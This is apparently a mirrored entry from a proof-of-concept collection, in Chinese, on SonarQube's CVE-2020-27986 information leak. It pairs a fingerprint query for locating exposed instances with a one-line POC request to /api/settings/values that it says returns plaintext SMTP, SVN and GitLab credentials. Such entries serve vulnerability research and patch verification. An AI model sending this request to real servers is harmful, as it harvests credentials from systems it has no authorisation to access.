mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
49 lines
516 B
Markdown
49 lines
516 B
Markdown
# SonarQube values 信息泄露漏洞 CVE-2020-27986
|
||
|
||
## 漏洞描述
|
||
|
||
SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
SonarQube
|
||
```
|
||
|
||
## 网络测绘
|
||
|
||
```
|
||
app="sonarQube-代码管理"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
主页如下
|
||
|
||
|
||
|
||
|
||
|
||
## 漏洞POC
|
||
|
||
|
||
|
||
```plain
|
||
http://xxx.xxx.xxx.xxx/api/settings/values
|
||
```
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
可泄露的为:明文SMTP、SVN和Gitlab等敏感信息
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
## |